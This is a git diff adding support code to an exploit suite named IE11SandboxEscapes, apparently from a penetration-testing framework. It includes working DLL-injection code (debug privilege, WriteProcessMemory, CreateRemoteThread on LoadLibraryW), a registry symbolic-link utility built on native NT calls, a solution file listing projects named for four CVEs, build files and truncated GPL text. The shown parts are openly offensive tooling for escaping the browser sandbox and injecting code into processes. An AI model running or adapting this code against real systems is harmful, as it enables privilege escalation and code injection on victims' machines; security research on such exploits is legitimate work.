+_COM_SMARTPTR_TYPEDEF(IShdocvwBroker, __uuidof(IShdocvwBroker)); \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp new file mode 100755 index 0000000000..50830eee4a --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp @@ -0,0 +1,161 @@ +/*-------------------------------------------------------------------- +REGLN - Manage Windows Rregistry Links V20R0 +====================================================================== + Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005; + + The following Copyrights apply: + + Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net> + Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net> + Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com> + + License: + + This software is distributed under the terms and conditions of + GPL - GNU General Public License. The software is provided AS + IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no + responsibility for any damages or consequences of usage of this + software. For more information, please read the attached GPL.TXT. + +--------------------------------------------------------------------*/ + +#define _CRT_SECURE_NO_WARNINGS + +#include <windows.h> +#include <stdio.h> +#include <stdlib.h> +#include <wchar.h> +#include "regln.h" +#include "Utils.h" + + +int checkargs(int argc, char *argv[]); +char *win2ntapi(char *win, int len); +int ntapi_init(void); +int usage(void); + +static fNtCreateKey NtCreateKey; +static fNtDeleteKey NtDeleteKey; +static fNtSetValueKey NtSetValueKey; + +int DeleteLink(LPCWSTR par_src) +{ + DWORD disposition, status; + HANDLE hdl_nt_keyhandle; + UNICODE_STRING nt_keyname; + OBJECT_ATTRIBUTES nt_object_attributes; + + ntapi_init(); + + nt_keyname.Buffer = par_src; + nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR); + + nt_object_attributes.ObjectName = &nt_keyname; + nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE | REG_OPTION_OPEN_LINK_ATTR; + nt_object_attributes.RootDirectory = NULL; // + nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type + nt_object_attributes.SecurityQualityOfService = NULL; // + nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES); + + // open link + status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE, &disposition); + + if (status == 0) { + DebugPrintf("DEBUG: %ls opened successfully.\n", par_src); + + // delete + status = NtDeleteKey(hdl_nt_keyhandle); + + if (status == 0) { + DebugPrintf("DEBUG: %ls deleted successfully.\n", par_src); + } + else { + DebugPrintf("ERROR: Link deletion failed. [Step 2] [Error %08X]\n", status); + return 1; + } + } + else { + DebugPrintf("ERROR: Link deletion failed. [Step 1] [Error %08X]\n", status); + return 1; + } + + return 0; +}; + +int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile) +{ + DWORD disposition, status; + HANDLE hdl_nt_keyhandle; + UNICODE_STRING nt_keyname, nt_valuename; + OBJECT_ATTRIBUTES nt_object_attributes; + + ntapi_init(); + + nt_keyname.Buffer = par_src; + nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR); + + nt_object_attributes.ObjectName = &nt_keyname; + nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE; + nt_object_attributes.RootDirectory = NULL; // + nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type + nt_object_attributes.SecurityQualityOfService = NULL; // + nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES); + + // create the key + if (opt_volatile) + status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, &disposition); + else + status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE | REG_OPTION_CREATE_LINK, &disposition); + + if (status == 0) { + DebugPrintf("DEBUG: Key %ls created successfully.\n", par_src); + + // the real action is here: + + nt_valuename.Buffer = REG_LINK_VALUE_NAME; + nt_valuename.Length = wcslen(REG_LINK_VALUE_NAME) * sizeof(WCHAR); + + status = NtSetValueKey(hdl_nt_keyhandle, &nt_valuename, 0, REG_LINK, par_dst, wcslen(par_dst) * sizeof(WCHAR)); + + if (status == 0) { + DebugPrintf("DEBUG: Value REG_LINK:%ls=%ls set succesfully.\n", REG_LINK_VALUE_NAME, par_dst); + } + else { + DebugPrintf("ERROR: Link creation failed. [Step 2] [Error %08X]\n", status); + return 1; + } + } + else { + DebugPrintf("ERROR: Link creation failed. [Step 1] [Error %08X]\n", status); + return 1; + } + + return 0; +} + + +int ntapi_init(void) { + #ifdef DEBUG + DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtCreateKey...\n"); + #endif + if(!(NtCreateKey = (fNtCreateKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateKey" ))) { + DebugPrintf("This program works only on Windows NT/2000/XP/NET\n"); + return 1; + } + #ifdef DEBUG + DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtDeleteKey...\n"); + #endif + if(!(NtDeleteKey = (fNtDeleteKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtDeleteKey" ))) { + DebugPrintf("This program works only on Windows NT/2000/XP/NET\n"); + return 1; + } + #ifdef DEBUG + DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtSetValueKey...\n"); + #endif + if(!(NtSetValueKey = (fNtSetValueKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSetValueKey" ))) { + DebugPrintf("This program works only on Windows NT/2000/XP/NET\n"); + return 1; + } + return 0; +} + diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h new file mode 100755 index 0000000000..b760e6e540 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h @@ -0,0 +1,70 @@ +/*-------------------------------------------------------------------- +REGLN - Manage Windows Rregistry Links V20R0 +====================================================================== + Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005; + + The following Copyrights apply: + + Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net> + Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net> + Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com> + + License: + + This software is distributed under the terms and conditions of + GPL - GNU General Public License. The software is provided AS + IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no + responsibility for any damages or consequences of usage of this + software. For more information, please read the attached GPL.TXT. + +--------------------------------------------------------------------*/ + + + +#define REG_LINK_VALUE_NAME L"SymbolicLinkValue" // found by tenox +//#define REG_OPTION_CREATE_LINK 2 // this is defined in MSVC 2.0 but not after +#define REG_OPTION_OPEN_LINK_ATTR 0x100 // found by tommy +#define OBJ_CASE_INSENSITIVE 0x40 + +// +// Following definitions are generously provided by Mark Russinovitch +// +typedef struct _UNICODE_STRING { + WORD Length; + WORD MaximumLength; + PCWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING *PUNICODE_STRING; + +typedef struct _OBJECT_ATTRIBUTES { + DWORD Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + DWORD Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES; +typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; + +typedef DWORD (__stdcall *fNtCreateKey)( + HANDLE KeyHandle, + DWORD DesiredAccess, + POBJECT_ATTRIBUTES ObjectAttributes, + DWORD TitleIndex, + PUNICODE_STRING Class, + DWORD CreateOptions, + PDWORD Disposition +); + +typedef DWORD (__stdcall *fNtSetValueKey)( + HANDLE KeyHandle, + PUNICODE_STRING ValueName, + DWORD TitleIndex, + DWORD Type, + const void* Data, + DWORD DataSize +); + +typedef DWORD (__stdcall *fNtDeleteKey)( + HANDLE KeyHandle +); diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp new file mode 100755 index 0000000000..51ec5e2107 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// CommandUtils.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h new file mode 100755 index 0000000000..c846c60793 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <tchar.h> +#include <Windows.h> +#include <strsafe.h> +#include <vector> +#include <string> +#include <sstream> diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h new file mode 100755 index 0000000000..87c0086de7 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln b/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln new file mode 100755 index 0000000000..f5cf04e173 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln @@ -0,0 +1,72 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.30501.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDll", "InjectDll\InjectDll.vcxproj", "{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5045", "CVE-2013-5045\CVE-2013-5045.vcxproj", "{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5046", "CVE-2013-5046\CVE-2013-5046.vcxproj", "{7A9AC14A-00BC-4A69-9B86-C80635606FEA}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0268", "CVE-2014-0268\CVE-2014-0268.vcxproj", "{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0257", "CVE-2014-0257\CVE-2014-0257.vcxproj", "{2A46841E-E3FC-42FF-BCDF-70F76E757E26}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|Win32.ActiveCfg = Debug|Win32 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.ActiveCfg = Debug|x64 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.Build.0 = Debug|x64 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|Win32.ActiveCfg = Release|Win32 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.ActiveCfg = Release|x64 + {4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.Build.0 = Release|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.ActiveCfg = Debug|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.Build.0 = Debug|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.ActiveCfg = Debug|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.Build.0 = Debug|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.ActiveCfg = Release|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.Build.0 = Release|Win32 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.ActiveCfg = Release|x64 + {A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.Build.0 = Release|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.ActiveCfg = Debug|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.Build.0 = Debug|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.ActiveCfg = Debug|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.Build.0 = Debug|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.ActiveCfg = Release|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.Build.0 = Release|Win32 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.ActiveCfg = Release|x64 + {04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.Build.0 = Release|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|Win32.ActiveCfg = Debug|Win32 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.ActiveCfg = Debug|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.Build.0 = Debug|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|Win32.ActiveCfg = Release|Win32 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.ActiveCfg = Release|x64 + {7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.Build.0 = Release|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|Win32.ActiveCfg = Debug|Win32 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.ActiveCfg = Debug|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.Build.0 = Debug|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|Win32.ActiveCfg = Release|Win32 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.ActiveCfg = Release|x64 + {CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.Build.0 = Release|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.ActiveCfg = Debug|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.Build.0 = Debug|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.ActiveCfg = Debug|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.Build.0 = Debug|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.ActiveCfg = Release|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.Build.0 = Release|Win32 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.ActiveCfg = Release|x64 + {2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp new file mode 100755 index 0000000000..4dfba1f89c --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp @@ -0,0 +1,107 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" + +BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) +{ + TOKEN_PRIVILEGES tp; + LUID luid; + + if(!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) + { + printf("Error 1 %d\n", GetLastError()); + return FALSE; + } + + tp.PrivilegeCount = 1; + tp.Privileges[0].Luid = luid; + if(bEnablePrivilege) + { + tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + } + else + { + tp.Privileges[0].Attributes = 0; + } + + if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) + { + printf("Error adjusting privilege %d\n", GetLastError()); + return FALSE; + } + + if(GetLastError() == ERROR_NOT_ALL_ASSIGNED) + { + printf("Not all privilges available\n"); + return FALSE; + } + + return TRUE; +} + + +int _tmain(int argc, _TCHAR* argv[]) +{ + if(argc < 3) + { + printf("Usage: InjectDll pid PathToDll\n"); + return 1; + } + + WCHAR path[MAX_PATH]; + + GetFullPathName(argv[2], MAX_PATH, path, nullptr); + int pid = wcstoul(argv[1], 0, 0); + + printf("Injecting DLL: %ls into PID: %d\n", path, pid); + + HANDLE hToken; + OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); + + SetPrivilege(hToken, SE_DEBUG_NAME, TRUE); + + HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid); + if(hProcess) + { + size_t strSize = (wcslen(path) + 1) * sizeof(WCHAR); + LPVOID pBuf = VirtualAllocEx(hProcess, 0, strSize, MEM_COMMIT, PAGE_READWRITE); + if(pBuf == NULL) + { + printf("Couldn't allocate memory in process\n"); + return 1; + } + SIZE_T written; + if (!WriteProcessMemory(hProcess, pBuf, path, strSize, &written)) + { + printf("Couldn't write to process memory\n"); + return 1; + } + + LPVOID pLoadLibraryW = GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"); + + if(!CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryW, pBuf, 0, NULL)) + { + printf("Couldn't create remote thread %d\n", GetLastError()); + } + } + else + { + printf("Couldn't open process %d\n", GetLastError()); + } + + return 0; +} + diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj new file mode 100755 index 0000000000..73d3147876 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj @@ -0,0 +1,155 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>InjectDll</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <PlatformToolset>v120</PlatformToolset> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="InjectDll.cpp" /> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp new file mode 100755 index 0000000000..85ffe01166 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// InjectDll.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h new file mode 100755 index 0000000000..83ad88a10f --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h @@ -0,0 +1,12 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#include <stdio.h> +#include <tchar.h> +#include <Windows.h> diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h b/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h new file mode 100755 index 0000000000..87c0086de7 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/external/source/exploits/IE11SandboxEscapes/LICENSE b/external/source/exploits/IE11SandboxEscapes/LICENSE new file mode 100755 index 0000000000..70566f2d0e --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/LICENSE @@ -0,0 +1,674 @@ +GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses 